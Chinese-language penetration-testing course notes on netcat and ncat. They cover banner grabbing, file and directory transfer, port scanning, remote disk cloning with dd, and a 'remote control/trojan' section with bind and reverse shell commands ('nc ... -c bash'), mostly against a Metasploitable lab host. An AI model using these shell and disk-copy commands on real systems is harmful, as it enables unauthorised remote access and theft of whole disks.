本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程
1. NETCAT – NC
2. NCAT
1. NETCAT – NC
telnet / 获取banner信息
#使用 nc 连接 163 邮箱 root@kali:~# ping pop3.163.com root@kali:~# nc -vn 123.125.50.29 110 (UNKNOWN) [123.125.50.29] 110 (pop3) open +OK Welcome to coremail Mail Pop3 Server (163coms[b62aaa251425b4be4eaec4ab4744cf47s]) USER test@163.com -ERR źµŕʺƔފ±²»¿ʓn¿ʄܵŔӲˇ:źµŕʺŶൎ³¢˔´µŃ݂鬳䚰²ȫ¿¼Ç,ϒćʱО׆źµŕʺŵðop·Ďˈ¨О +OK core mail # 出现乱码,账号和密码需要 base64 编码 root@kali:~# base64 test@163.com【ctrl+d】 dGVzdEAxNjMuY29tCg== root@kali:~# nc -vn 123.125.50.29 110 (UNKNOWN) [123.125.50.29] 110 (pop3) open +OK Welcome to coremail Mail Pop3 Server (163coms[b62aaa251425b4be4eaec4ab4744cf47s]) USER dGVzdEAxNjMuY29tCg== +OK core mail root@kali:~# nc -nv 192.168.1.110 25 (UNKNOWN) [192.168.1.110] 25 (smtp) open 220 metasploitable.localdomain ESMTP Postfix (Ubuntu) root@kali:~# nc -nv 192.168.1.110 80 (UNKNOWN) [192.168.1.110] 80 (http) open head /
传输文本信息
A: root@kali:~# nc -l -p 4444 B: root@metasploitable:~# nc -nv 192.168.1.100 4444 # 可以传递输入的消息 # 电子取证的时候要求被审计的目标尽可能少的被修改硬盘数据,可以使用 nc 进行传递消息 A: root@kali:~# nc -l -p 4444 B: root@metasploitable:~# ls -l | nc -nv 192.168.1.100 4444 root@kali:~# nc -l -p 4444 > ps.txt root@metasploitable:~# ps aux | nc -nv 192.168.1.100 -q 1 # -q 1 : 1秒之后断开连接 A: root@kali:~# nc -l -p 4444 > lsof.txt B: root@metasploitable:~# lsof | nc -nv 192.168.1.100 4444 -q 1
传输文件/目录
• 传输文件( B->A ) A:root@kali:~# nc -lp 4444 > 2.mp4 B:root@metasploitable:~# nc -nv 192.168.1.100 4444 < AWVS\ 01.avi -q 1 或(A->B) A:root@kali:~# nc -q 1 -lp 4444 < 2.mp4 B:root@metasploitable:~# nc -nv 192.168.1.100 4444 > 3.mp4 • 传输目录 A:root@kali:~# tar zcvf - testdir/ | nc -lp 4444 -q 1 B:root@metasploitable:~# nc 192.168.1.100 4444 | tar zxvf -
加密传输文件
• 加密传文件 A:root@kali:~# nc -lp 4444 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4 B:root@metasploitable:~# mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 192.168.1.100 333 -q 1
流媒体服务器
A: root@metasploitable:~# cat 3.mp4 | nc -lp 333 B: root@kali:~# nc -nv 192.168.1.110 | mplayer -vo x11 -cache 3000 -
端口扫描
root@kali:~# nc -nvz 192.168.1.110 1-65535 root@kali:~# nc -nvz 192.168.1.110 1-1024
远程控制/木马
• 正向:(B->A) • A:root@kali:~# nc -lp 333 -c bash • B:root@metasploitable:~# nc -nv 192.168.1.100 333 • 反向:(A->B) • A:nc -lp 333 • B:nc 1.1.1.1 333 -c bash • 注:Windows用户把bash改成cmd;
远程克隆硬盘
• A: root@kali:~# nc -lp 4444 | dd of=/dev/sda • B: root@metasploitable:~# dd if=/dev/sda | nc -nv 192.168.1.100 4444 -q 1 • 远程电⼦子取证,可以将目标服务器硬盘远程复制,或者内存。
2. NCAT
- Nc缺乏加密和⾝身份验证的能力
Ncat包含于nmap⼯工具包中
#allow:允许访问的主机 A:root@kali:~# ncat -c bash --allow 192.168.1.110 -vnl 333 --ssl B:root@metasploitable:~# ncat -nv 192.168.1.100 333 --ssl